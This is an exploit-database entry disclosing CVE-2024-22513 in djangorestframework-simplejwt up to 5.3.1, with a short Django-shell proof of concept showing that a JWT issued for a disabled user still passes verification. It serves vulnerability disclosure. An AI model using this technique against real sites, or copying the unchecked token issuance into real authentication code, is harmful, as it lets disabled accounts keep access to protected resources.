Share
## https://sploitus.com/exploit?id=PACKETSTORM:178050
# Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure  
# Date: 26/01/2024  
# Exploit Author: Dhrumil Mistry (dmdhrumilmistry)  
# Vendor Homepage: https://github.com/jazzband/djangorestframework-simplejwt/  
# Software Link:https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1  
# Version: <= 5.3.1  
# Tested on: MacOS  
# CVE : CVE-2024-22513  
  
# The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable.  
# This vulnerability has the potential to cause various security issues,  
# including Business Object Level Authorization (BOLA), Business Function  
# Level Authorization (BFLA), Information Disclosure, etc. The vulnerability  
# arises from the fact that a user can access web application resources even  
# after their account has been disabled, primarily due to the absence of proper  
# user validation checks.  
  
# If a programmer generates a JWT token for an inactive user using  
`AccessToken`  
# class and `for_user` method then a JWT token is returned which can  
be used for  
# authentication across the django and django rest framework application.  
  
# Start Django Shell using below command:  
# python manage.py shell  
# ----------------------------------------  
  
# Create inactive user and generate token for the user  
from django.contrib.auth.models import User  
from rest_framework_simplejwt.tokens import AccessToken  
  
# create inactive user  
inactive_user_id = User.objects.create_user('testuser',  
'test@example.com', 'testPassw0rd!', is_active=False).id  
  
# django application programmer generates token for the inactive user  
AccessToken.for_user(User.objects.get(id=inactive_user_id)) # error  
should be raised since user is inactive  
  
# django application verifying user token  
AccessToken.for_user(User.objects.get(id=inactive_user_id)).verify() #  
no exception is raised during verification of inactive user token